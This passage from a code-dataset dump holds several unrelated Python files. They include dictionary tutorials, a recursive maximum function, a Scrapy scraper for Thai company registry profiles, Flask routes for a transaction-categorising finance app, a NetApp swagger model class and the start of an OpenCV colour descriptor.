6.py","file_name":"피보나치 수 6.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"343303338","text":"########## 辞書型(dict)に関してのまとめ ##########\n\n################ practice 4-1 ################\n#辞書型はindexナンバーではなく任意のキー文字列で内容を操作する。\n#辞書型のデータ作成例\n#変数 = {'キー1':値1, 'キー2':値2, 'キー3':値3}\n\n#実際に作成してみる\nages = {'中村': 28, '木原': 19, '佐々木': 21, '柴田': 18}\nprint(ages) #print OK!\n\n#辞書型から値を取り出す\nprint(\"木原の年齢は{0}歳です\".format(ages['木原']))\n\n#辞書型のないようを更新する\nages['柴田'] = 19\nprint(ages)\n\nprint(\"\\n\")\n\n#辞書型にもin 句を用いることが可能\nprices = {'リンゴ': 100, 'バナナ': 90, 'オレンジ': 120}\n#リンゴはある?\nprint(\"リンゴはある?\")\nif 'リンゴ' in prices:\n print(\"あります。\")\nelse:\n print(\"ありません。\")\nprint(\"{0}円です。\".format(prices['リンゴ']))\n\n#オレンジはある?\nprint(\"パイナポーはある?\")\nif 'パイナポー' in prices:\n print(\"あります。\")\nelse:\n print(\"ありません。\")\n# print(\"{0}円です。\".format(prices['パイナポー']))\nprint(\"\\n\")\n\n#辞書型のキーが思い出せなくても大丈夫!keys()で列挙することができる。\nprint(\"prisesのキーは、{0}だよ。\".format(prices.keys()))\n\nprint(\"listを使うと{0}と表示される\".format(list(prices.keys())))\nprint(\"sortedを使うと{0}と並び替えて表示される\".format(sorted(prices.keys()))) #実は文字コード順に並び替えている。\nprint(\"\\n\")\n\n#辞書型(dict)の値を列挙する小技まとめ\n# list(dict.keys())\n# sorted(dict.keys())\n# dict,values()\n# list(dict.items())\n\n#辞書型とforを組み合わせて使う\nfluits = {\n 'リンゴ': 100,\n 'バナナ': 
90,\n 'オレンジ': 120,\n 'メロン': 500,\n 'マンゴー': 410\n}\n\n#辞書型のデータ一覧を表示1 ループで辞書型を表示\nfor name in fluits.keys(): #繰り返し変数 in 個数分\n # 値段を得る\n price = fluits[name]\n #画面に出力\n s = \"{0}の値段は{1}円です。\".format(name, price)\n print(s)\nelse:\n print(\"以上が販売している商品の一覧です。\\n\")\n\n#辞書型のデータ一覧を表示2 items()を利用する\nfor name, price in fluits.items():\n #items()を用いることによって辞書型から変数を2個取って来れる\n s = \"{0}の値段は{1}円です。\".format(name, price)\n print(s)\nelse:\n print(\"こっちの方がスマートでしょう?\\n\")\n\n#for キー, 値 in 辞書型.items():\n# キーと値を利用する\n\n#成績データを辞書型で定義\nrecords = {\n 'Tanaka': 72, 'Yamada': 65, 'Hirata': 100,\n 'Akai': 56, 'Hukuda':66, 'Sakai':80\n}\n\n\n#合計を求める\nsum_v = 0\nfor v in records.values(): #recordsの値だけを順に取得\n sum_v += v\n\n#合計値を要素数で割る\nave_v = sum_v / len(records)\nprint(\"合計点:\", sum_v)\nprint(\"平均点:\", ave_v)\n\n#成績データの一覧と平均点との差を表示\nfmt = \"| {0:<7} | {1:>4} | {2:>5} |\"\n#{0}を7文字左寄せ、{1}を4文字右寄せ、{2}を5文字右寄せにする\n\nprint(fmt.format(\"名前\", \"点数\", \"差\"))\nfor name, v in sorted(records.items()):\n #平均点との��を求める\n diff_v = v - ave_v\n #小数点以下を丸める\n diff_v = round(diff_v, 1) #diff_vの値を小数以下1位に四捨五入\n #設定した書式に沿って出力\n print(fmt.format(name, v, diff_v))\nelse:\n print(\"こんな器用なこともできるんですよ\\n\")\n\n\n#英単語の出現回数を調べる\ntext = \"\"\"\nHe's been watching us since we arrived.\nNo, she helped me with my homework.\nBut my daughter's wedding cost me a fortune.\nIn the morning, I love to have a cup of coffee!\nWhat should we season it with?\n\"\"\"\n# 単語を区切る\n#文字列 = 文字列.replace(\"A\", \"B\") AをBに置き換える\ntext = text.replace(\",\", \"\") #,を削除\ntext = text.replace(\".\", \"\") #.を削除\ntext = text.replace(\"!\", \"\") #!を削除\ntext = text.replace(\"?\", \"\") #?を削除\n#\nwords = text.split() #空白で区切ってリスト型を作成\n\n#単語を数える\ncounter = {} #counterという空白の辞書型を作成\n\nfor w in words:\n ws = w.lower() #小文字に変換\n if ws in counter: #もし辞書型にすでにキーがあれば値を一つ追加\n counter[ws] += 1\n else: #もし辞書型にキーがなければ値を1としてキーを登録\n counter[ws] = 1\n\n#結果を表示\nfor k, v in sorted(counter.items()):\n if v >= 1: #文字列が1つ以上あれば表示する\n print(k, v) #文字と個数を表示","sub_path":"Python/practice4.py","file_name":"practice4.py","file_ext":"py","file_size_in_byte":4653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"353140001","text":"#!/usr/bin/env python\n\nimport advanced_python_regex as apr\nfrom collections import defaultdict\n\nfaculty = apr.read_faculty()\n\n# Q6\n\nfaculty_dict = defaultdict(list)\n\nfor prof in faculty:\n surname = prof['name'].split()[-1]\n faculty_dict[surname].append([prof['degree'], prof['title'], prof['email']])\n\nfor item in list(faculty_dict.items())[:3]:\n print(item)\n\n# Q7\n\nprof_dict = {}\n\nfor prof in faculty:\n names = prof['name'].split()\n fname, surname = names[0], names[-1]\n prof_dict[(fname, surname)] = [prof['degree'], prof['title'], prof['email']]\n\nprint()\n\nfor item in list(prof_dict.items())[:3]:\n print(item)\n\n# Q8\n\nprint()\n\nfor item in sorted(prof_dict.items(), key=lambda t: (t[0][1], t[0][0]))[:3]:\n print(item)\n","sub_path":"python/advanced_python_dict.py","file_name":"advanced_python_dict.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"231585120","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\ndef findMaximum(elements,i=0,maximum=None):\n\t# Cas de base\n\tif(i >= len(elements)): return maximum\n\t# Cas général, initialement, maximum = elements[0]\n\t# Sinon maximum = max(maximum,elements[i])\n\tif(i<1): maximum = elements[0]\n\telif(elements[i]>maximum): maximum = 
elements[i]\n\t# Appel récursif sur la suite de la liste\n\treturn findMaximum(elements,i+1,maximum)\n\nprint(findMaximum([3,4,5,2,3,6]))\n","sub_path":"Algorithmique/Récursivité/FindMaximum.py","file_name":"FindMaximum.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"468216468","text":"import os, time, re, pickle, signal\nimport pytesseract\nfrom PIL import Image\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium import webdriver\nimport scrapy\nimport json\nfrom postscrape.items import PostscrapeItem\n\nclass DBDSpider(scrapy.Spider):\n name = \"dbd_thai\"\n # start_urls = ['https://datawarehouse.dbd.go.th/company/profile/5/0105554123553']\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'\n }\n allowed_domains = [\"datawarehouse.dbd.go.th\"]\n\n def start_requests(self):\n urls = [\n \"https://datawarehouse.dbd.go.th/company/profile/5/0105554123553\"\n ]\n for url in urls:\n # yield scrapy.Request(url=url, cookies={\"JSESSIONID\":'OTk2YjM4MWYtNTQwMi00YmUwLTk2ZjItMzYxM2M4YjAzNDAw'}, callback=self.parse)\n yield scrapy.Request(url=url, cookies={\"JSESSIONID\":self.getCookie}, callback=self.parse)\n\n def getCookie(self):\n cookie_path = '/Users/mya/Desktop/Development/scrapyTest/postscrape/postscrape/spiders/temp/cookie.json'\n if os.path.isfile(cookie_path):\n try:\n with open(cookie_path, 'rb') as f: \n cookies = pickle.load(f)\n except EOFError:\n cookies = None\n\n for i in cookies:\n if i['name']=='JSESSIONID':\n cookies= i['value']\n break\n print(cookies)\n return cookies\n\n def writeJsonFile(self, data):\n filePath = '/Users/mya/Desktop/Development/scrapyTest/postscrape/postscrape/spiders/temp/thaiVersion.json'\n a_file = open(filePath, \"w\", encoding='utf-8')\n line = json.dumps(data, ensure_ascii=False) + \"\\n\"\n a_file.write(line)\n\n def readLoadsFile(self):\n loadsfilePath = '/Users/mya/Desktop/Development/scrapyTest/postscrape/postscrape/spiders/temp/thaiVersion.json'\n print('------------Target Company Information------------')\n loadsdata = json.load(open(loadsfilePath))\n print(loadsdata)\n return loadsdata\n\n def parse(self, response):\n print('------------START SCRAPING------------')\n time.sleep(5)\n objective = response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[3]/div[5]/div/p/text()').get()\n if objective == '-':\n objective = response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[3]/div[3]/div/p/text()').get()\n\n director_list = []\n directors = response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[2]/div/div/ol/li/text()').getall()\n for i in directors:\n director_list.append(i.strip())\n\n raw_bussiness_type = response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[3]/div[4]/div/p/text()').get()\n try:\n raw_bussiness_type = raw_bussiness_type.strip()\n except:\n raw_bussiness_type = 'ERRRRRRRRRRRRRRRRRRRORRRRRRRRRRRRRRRRRRRRRR:' + response.url.split('/')[-1]\n\n if raw_bussiness_type == '-':\n raw_bussiness_type = response.xpath('/html/body/div/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[3]/div[2]/div/p/text()').get().strip()\n \n tel = response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[1]/div[2]/table/tbody/tr[3]/td[2]/text()').get()\n if tel == 
None:\n tel = 'No Data'\n\n fax = response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[1]/div[2]/table/tbody/tr[4]/td[2]/text()').get()\n if fax == None:\n fax = 'No Data'\n\n website = response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[1]/div[2]/table/tbody/tr[5]/td[2]/text()').get()\n if website == None:\n website = 'No Data'\n\n email = response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[1]/div[2]/table/tbody/tr[6]/td[2]/text()').get()\n if email == None:\n email = 'No Data'\n\n item = []\n # item['companies'] = []\n item.append({\n 'company_name': response.xpath('/html/body/div/div[4]/div[2]/div[1]/div[1]/h2/text()').get(),\n 'company_id': '0105554123553',\n 'company_type': response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[1]/div[1]/table/tr[1]/th[2]/text()').get(),\n 'status': response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[1]/div[1]/table/tr[3]/td[2]/text()').get(),\n 'address': response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[1]/div[2]/table/tr[2]/td/text()').get(),\n 'objective': objective,\n 'directors': director_list,\n 'bussiness_type': raw_bussiness_type,\n 'tel': tel,\n 'fax': fax,\n 'website': website,\n 'email': email,\n })\n\n # item['company_name'] = response.xpath('/html/body/div/div[4]/div[2]/div[1]/div[1]/h2/text()').get()\n # item['company_id'] = '0105554123553'\n # item['company_type'] = response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[1]/div[1]/table/tr[1]/th[2]/text()').get()\n # item['status'] = response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[1]/div[1]/table/tr[3]/td[2]/text()').get()\n # item['address'] = response.xpath('/html/body/div[1]/div[4]/div[2]/div[1]/div[2]/div[2]/div[1]/div[1]/div[2]/table/tr[2]/td/text()').get()\n # item['objective'] = objective\n # item['directors'] = director_list\n # item['bussiness_type'] = raw_bussiness_type\n\n self.writeJsonFile(item)\n item = self.readLoadsFile()\n \n return item","sub_path":"postscrape/postscrape/spiders/spider_Thai.py","file_name":"spider_Thai.py","file_ext":"py","file_size_in_byte":5949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"15911517","text":"\"\"\"\n————面对对象编程————\n类class——创建一个类class\n 如:class person:\n 主体\n\n对象object——类的一个实例,或者说类的一次调用:如 p=person()\n\n类的属性——类的实体可以是数据(变量)、功能(函数),区别于普通变量和函数,称为字段、方法\n\n字段Field——即从属与类或者对象的变量,从属于类本身的:类变量,���属于类的一个独立的实例或对象:对象变量\n 类变量——共享的,可以被类的所有实例访问并修改,且修改对所有有效\n 对象变量——不共享,每个类的独立对象拥有属于自己的变量副本\n\n方法Method——即从属于类的函数,与普通函数的区别是必须多加一个参数self到参数列表开头\n\n__init__()——一种特殊方法,不同于其他方法的地方是:这种方法在类被实例化(创建一个对象)时就立即自动运行,而不必具体调用\n\n\"\"\"\nclass Robot:\n population = 0 #类变量,共享——用于对机器人当前数量计数\n\n def __init__(self,name): #机器人初始化\n self.name = name #name是属于对象(由self生成)的对象变量,不共享,只属于该对象\n print(\"Initializing {}\".format(self.name))\n Robot.population += 1\n\n def die(self): #销毁机器人\n print(\"{} is being destroyed\".format(self.name))\n Robot.population -= 1\n if Robot.population == 0:\n print(\"{} was the last one.\".format(self.name))\n else:\n print(\"There are still {:d} robots working.\".format(Robot.population))\n\n def say_hello(self): #机器人打招呼\n print(\"hello,my master call me {}\".format(self.name))\n\n @classmethod #classmethod装饰器将下面方法直接标记为类方法,便于识别,不用回头看和类的关系\n def how_many(cls):\n print(\"we have {:d} robots.\".format(cls.population))\n\n\np1 = Robot(\"R2-D2\") 
#调用一次类Robot后,创建一个针对参数R2-D2的实例——即对象\np1.say_hello() #因R2-D2是对象变量,不共享,所以使用到R2-D2时,使用对象p1来调用\nRobot.how_many() #population是类变量,共享,使用使用到population时直接用类来调用\nprint()\np2 = Robot(\"C-3PO\") #再次调用类Robot,再创建一个针对参数C-3PO的实例——即对象\np2.say_hello()\nRobot.how_many()\nprint()\np1.die() #die方法也用到对象变量R2-D2,不共享,使用对应的对象p1来调用\np2.die()\nRobot.how_many()\n","sub_path":"Object/class.py","file_name":"class.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"254843608","text":"from app import db\nfrom app.forms import AddTransactionForm, AddRuleForm, TransactionRulesMapperForm, EditRuleForm\nfrom app.models import User, Account, Transaction, load_user, TransactionType, Rule, RuleEffect\nfrom flask import render_template, request, flash, redirect, url_for\nfrom flask_login import current_user, login_required\nfrom app.main import bp\nimport csv\nfrom io import StringIO\nfrom datetime import datetime\nfrom decimal import Decimal\nimport fnmatch\nfrom collections import OrderedDict\nfrom sqlalchemy import func\n\n@bp.route('/')\ndef home():\n return render_template('home.html', title=\"Home\")\n\n\n@bp.route('/index')\n@login_required\ndef index():\n user = load_user(current_user.id)\n\n account_info = {}\n\n return render_template('index.html', title=\"Home\", account_info=account_info)\n\n\n@bp.route('/transactions', methods=['GET', 'POST'])\n@login_required\ndef transactions():\n user = load_user(current_user.id)\n\n form = AddTransactionForm()\n\n if form.validate_on_submit():\n transaction = Transaction(user_id=user.id, description=form.description.data, amount=form.amount.data)\n\n if form.credit.data:\n transaction.type = TransactionType.CREDIT.value\n else:\n transaction.type = TransactionType.DEBIT.value\n\n db.session.add(transaction)\n db.session.commit()\n\n return render_template('transactions.html', user=user, form=form)\n\n\n@bp.route('/categoryreport', methods=['GET', 'POST'])\n@login_required\ndef category_report():\n user = load_user(current_user.id)\n\n transactions = \\\n Transaction.query.filter(User.id == user.id, Transaction.transaction_date > '2018-01-01',\n Transaction.transaction_date < '2018-12-01').order_by(Transaction.rule_id).all()\n rules = Rule.query.filter(User.id == user.id).all()\n\n rules_dict = {rule.id: rule for rule in rules}\n # print(rules_dict)\n category_mappings = {}\n category_subcategory_mappings = {}\n for transaction in transactions:\n if transaction.rule_id is not None:\n rule = rules_dict[transaction.rule_id]\n if rule.effect != RuleEffect.EXCLUDE.value:\n try:\n current_total = category_mappings[rule.category]\n except KeyError:\n current_total = Decimal(0)\n category_mappings[rule.category] = current_total + transaction.amount\n\n key = rule.category + \"-\" + rule.sub_category\n try:\n current_total = category_subcategory_mappings[key]\n except KeyError:\n current_total = Decimal(0)\n if transaction.type == TransactionType.CREDIT.value:\n category_subcategory_mappings[key] = current_total + transaction.amount\n else:\n category_subcategory_mappings[key] = current_total - transaction.amount\n else:\n try:\n current_total = category_mappings[\"Unmapped\"]\n except KeyError:\n current_total = Decimal(0)\n category_mappings[\"Unmapped\"] = current_total + transaction.amount\n\n try:\n current_total = category_subcategory_mappings[\"Unmapped\"]\n except KeyError:\n current_total = Decimal(0)\n if transaction.type == TransactionType.CREDIT.value:\n 
category_subcategory_mappings[\"Unmapped\"] = current_total + transaction.amount\n else:\n category_subcategory_mappings[\"Unmapped\"] = current_total - transaction.amount\n\n\n # print(\"--\")\n # print(category_mappings)\n # print(\"--\")\n # print(sorted(category_subcategory_mappings))\n\n # category_subcategory_list = []\n # for key, value in sorted(collections.OrderedDict(category_subcategory_mappings.items())):\n # category_subcategory_mappings.append({\"category-subcategory\": key, \"total\": value})\n\n return render_template('categoryreport.html',\n report=OrderedDict(sorted(category_subcategory_mappings.items(), key=lambda t: t[0])))\n\n\n@bp.route('/transactionsrulesmapper', methods=['GET', 'POST'])\n@login_required\ndef transactions_rules_mapper():\n user = load_user(current_user.id)\n\n grouped_transactions = \\\n db.session.query(Transaction.description, func.count('*'), func.sum(Transaction.amount).label('total')) \\\n .filter_by(user_id=user.id, rule_id=None) \\\n .group_by(Transaction.description)\\\n .order_by(func.sum(Transaction.amount).desc()).all()\n\n print(grouped_transactions)\n\n form = TransactionRulesMapperForm()\n\n if form.validate_on_submit():\n rule = Rule(user=user, match_string=form.match_string.data,\n category=form.category.data, sub_category=form.sub_category.data)\n\n db.session.add(rule)\n db.session.commit()\n\n unmatched_transactions = \\\n Transaction.query.filter_by(user_id=user.id, rule_id=None).order_by(Transaction.description).all()\n\n for transaction in unmatched_transactions:\n if fnmatch.fnmatch(transaction.description, rule.match_string):\n transaction.rule_id = rule.id\n\n db.session.commit()\n\n unmatched_transactions = \\\n Transaction.query.filter_by(user_id=user.id, rule_id=None).order_by(Transaction.description).all()\n\n return render_template('transactions_rules_mapper.html', transactions=grouped_transactions, form=form)\n\n\n@bp.route('/rules', methods=['GET', 'POST'])\n@login_required\ndef rules():\n\n user = load_user(current_user.id)\n form = AddRuleForm()\n\n if form.validate_on_submit():\n rule = Rule(user=user, match_string=form.match_string.data,\n category=form.category.data, sub_category=form.sub_category.data)\n\n db.session.add(rule)\n db.session.commit()\n\n for transaction in user.transactions:\n if fnmatch.fnmatch(transaction.description, rule.match_string):\n transaction.rule_id = rule.id\n\n db.session.commit()\n\n # rules = db.session.query(Transaction.rule_id, func.count('*').label('rule_count'))\\\n # .group_by(Transaction.rule_id).join(Rule.transactions).all()\n\n return render_template('rules.html', rules=user.rules, form=form)\n\n\n@bp.route('/edit_rule/', methods=['GET', 'POST'])\n@login_required\ndef edit_rule(rule_id):\n\n user = load_user(current_user.id)\n rule = Rule.query.get(int(rule_id))\n\n form = EditRuleForm()\n\n if form.validate_on_submit():\n rule.match_string = form.match_string.data\n rule.sub_category = form.sub_category.data\n rule.category = form.category.data\n\n db.session.add(rule)\n\n # Remove mapping for existing rule, then apply match again over all transactions\n for transaction in rule.transactions:\n rule.transactions.remove(transaction)\n\n for transaction in user.transactions:\n if fnmatch.fnmatch(transaction.description, rule.match_string):\n transaction.rule_id = rule.id\n\n db.session.commit()\n\n flash('Rule details have been updated.')\n\n elif request.method == 'GET':\n form.match_string.data = rule.match_string\n form.category.data = rule.category\n form.sub_category.data 
= rule.sub_category\n\n return render_template('edit_rule.html', rule=rule, form=form)\n\n\n@bp.route('/delete_rule/')\n@login_required\ndef delete_rule(rule_id):\n\n rule = Rule.query.get(int(rule_id))\n\n db.session.delete(rule)\n db.session.commit()\n\n flash('Rule deleted.')\n\n return redirect(url_for('main.rules'))\n\n\ndef utf_8_encoder(unicode_csv_data):\n for line in unicode_csv_data:\n yield line.encode('utf-8')\n\n\ndef transaction_exists(transaction, existing_transactions):\n for existing_transaction in existing_transactions:\n if (existing_transaction.transaction_date ==\n datetime.strptime(transaction.transaction_date, \"%d-%b-%y\") and\n existing_transaction.description == transaction.description and\n Decimal(existing_transaction.amount) == Decimal(transaction.amount)):\n return True;\n return False;\n\n\n@bp.route('/upload', methods=['GET', 'POST'])\n@login_required\ndef upload():\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n file = request.files['file']\n # if user does not select file, browser also\n # submit an empty part without filename\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file:\n # with open(file.read(), 'r') as f:\n # content = [row for row in csv.reader(f.read().splitlines(), delimiter=',')]\n content = file.read()\n content = content.decode('utf-8')\n content = content.replace(\"\\r\", \"\\n\")\n csv_reader = csv.reader(StringIO(content), delimiter=',', dialect=csv.excel)\n\n user = load_user(current_user.id)\n\n next(csv_reader, None)\n\n # Need to keep additional list so that we don't discard same transactions in the\n # same upload. e.g. multiple buys at same place on same day for same amount\n new_transactions = []\n\n for row in csv_reader:\n\n transaction_date = row[0]\n description = row[1]\n credit = row[7]\n debit = row[6]\n\n transaction = Transaction(user_id=user.id, transaction_date=transaction_date, description=description)\n if credit:\n transaction.type = TransactionType.CREDIT.value\n transaction.amount = credit\n else:\n transaction.type = TransactionType.DEBIT.value\n transaction.amount = debit\n\n if not transaction_exists(transaction, user.transactions):\n new_transactions.append(transaction)\n else:\n print(\"Transaction already exists:\" + str(transaction.amount))\n\n db.session.add_all(new_transactions)\n db.session.commit()\n\n return render_template('upload_transactions.html')\n\n","sub_path":"app/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":10418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"54690330","text":"# coding: utf-8\n\n\"\"\"\nPITConsistencyGroupViewCreationDescriptor.py\n\n The Clear BSD License\n\n Copyright (c) – 2016, NetApp, Inc. All rights reserved.\n\n Redistribution and use in source and binary forms, with or without modification, are permitted (subject to the limitations in the disclaimer below) provided that the following conditions are met:\n\n * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.\n\n * Neither the name of NetApp, Inc. 
nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.\n\n NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\nfrom pprint import pformat\nfrom six import iteritems\n\n\nclass PITConsistencyGroupViewCreationDescriptor(object):\n \"\"\"\n NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\n \"\"\"\n def __init__(self):\n \"\"\"\n PITConsistencyGroupViewCreationDescriptor - a model defined in Swagger\n\n :param dict swaggerTypes: The key is attribute name\n and the value is attribute type.\n :param dict attributeMap: The key is attribute name\n and the value is json key in definition.\n \"\"\"\n self.swagger_types = {\n 'cg_ref': 'str', # (required parameter)\n 'pit_sequence_number': 'int', # (required parameter)\n 'view_creation_descriptor': 'list[PITViewCreationDescriptor]', # (required parameter)\n 'label': 'str'\n }\n\n self.attribute_map = {\n 'cg_ref': 'cgRef', # (required parameter)\n 'pit_sequence_number': 'pitSequenceNumber', # (required parameter)\n 'view_creation_descriptor': 'viewCreationDescriptor', # (required parameter)\n 'label': 'label'\n }\n\n self._cg_ref = None\n self._pit_sequence_number = None\n self._view_creation_descriptor = None\n self._label = None\n\n @property\n def cg_ref(self):\n \"\"\"\n Gets the cg_ref of this PITConsistencyGroupViewCreationDescriptor.\n The Consistency Group on which views are to be created. All PiTs referenced in the view creation descriptors must be part of this consistency group.\n\n :return: The cg_ref of this PITConsistencyGroupViewCreationDescriptor.\n :rtype: str\n :required/optional: required\n \"\"\"\n return self._cg_ref\n\n @cg_ref.setter\n def cg_ref(self, cg_ref):\n \"\"\"\n Sets the cg_ref of this PITConsistencyGroupViewCreationDescriptor.\n The Consistency Group on which views are to be created. All PiTs referenced in the view creation descriptors must be part of this consistency group.\n\n :param cg_ref: The cg_ref of this PITConsistencyGroupViewCreationDescriptor.\n :type: str\n \"\"\"\n self._cg_ref = cg_ref\n\n @property\n def pit_sequence_number(self):\n \"\"\"\n Gets the pit_sequence_number of this PITConsistencyGroupViewCreationDescriptor.\n The sequence number of PiTs for which views are to be created. 
PITRefs in the view creation descriptors provided must have this sequence number (this is just for cross-checking the list of PiTs).\n\n :return: The pit_sequence_number of this PITConsistencyGroupViewCreationDescriptor.\n :rtype: int\n :required/optional: required\n \"\"\"\n return self._pit_sequence_number\n\n @pit_sequence_number.setter\n def pit_sequence_number(self, pit_sequence_number):\n \"\"\"\n Sets the pit_sequence_number of this PITConsistencyGroupViewCreationDescriptor.\n The sequence number of PiTs for which views are to be created. PITRefs in the view creation descriptors provided must have this sequence number (this is just for cross-checking the list of PiTs).\n\n :param pit_sequence_number: The pit_sequence_number of this PITConsistencyGroupViewCreationDescriptor.\n :type: int\n \"\"\"\n self._pit_sequence_number = pit_sequence_number\n\n @property\n def view_creation_descriptor(self):\n \"\"\"\n Gets the view_creation_descriptor of this PITConsistencyGroupViewCreationDescriptor.\n A list of creation descriptors for the views to be created.\n\n :return: The view_creation_descriptor of this PITConsistencyGroupViewCreationDescriptor.\n :rtype: list[PITViewCreationDescriptor]\n :required/optional: required\n \"\"\"\n return self._view_creation_descriptor\n\n @view_creation_descriptor.setter\n def view_creation_descriptor(self, view_creation_descriptor):\n \"\"\"\n Sets the view_creation_descriptor of this PITConsistencyGroupViewCreationDescriptor.\n A list of creation descriptors for the views to be created.\n\n :param view_creation_descriptor: The view_creation_descriptor of this PITConsistencyGroupViewCreationDescriptor.\n :type: list[PITViewCreationDescriptor]\n \"\"\"\n self._view_creation_descriptor = view_creation_descriptor\n\n @property\n def label(self):\n \"\"\"\n Gets the label of this PITConsistencyGroupViewCreationDescriptor.\n The name of the new Consistency Group View.\n\n :return: The label of this PITConsistencyGroupViewCreationDescriptor.\n :rtype: str\n :required/optional: required\n \"\"\"\n return self._label\n\n @label.setter\n def label(self, label):\n \"\"\"\n Sets the label of this PITConsistencyGroupViewCreationDescriptor.\n The name of the new Consistency Group View.\n\n :param label: The label of this PITConsistencyGroupViewCreationDescriptor.\n :type: str\n \"\"\"\n self._label = label\n\n def to_dict(self):\n \"\"\"\n Returns the model properties as a dict\n \"\"\"\n result = {}\n\n for attr, _ in iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"\n Returns the string representation of the model\n \"\"\"\n return pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"\n For `print` and `pprint`\n \"\"\"\n if self is None:\n return None\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"\n Returns true if both objects are equal\n \"\"\"\n if self is None or other is None:\n return None\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"\n Returns true if both objects are not equal\n \"\"\"\n return not self == 
other\n\n","sub_path":"netapp/santricity/models/symbol/pit_consistency_group_view_creation_descriptor.py","file_name":"pit_consistency_group_view_creation_descriptor.py","file_ext":"py","file_size_in_byte":8287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"238859748","text":"# import the necessary packages\nimport numpy as np\nimport cv2\n\n\nclass ColorDescriptor:\n def __init__(self, bins):\n # store the number of bins for the 3D histogram\n self.bins = bins\n\n def describe(self, image):\n # convert the image to the HSV color space and initialize\n # the features used to quantify the image\n image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n features = []\n\n # grab the dimensions and compute the center of the image\n (h, w) = image.shape[:2]\n (cX, cY) = (int(w * 0.5), int(h * 0.5))\n\n\n # construct an elliptical mask representing the center of the\n # image\n (axesX, axesY) = ((int)((w * 0.75) / 2), (int)((h * 0.75) / 2))\n ellipMask = np.zeros(image.shape[:2], dtype=\"uint8\")\n cv2.ellipse(ellipMask, (cX, cY), (axesX, axesY), 0.0, 0.0, 360.0, 255, 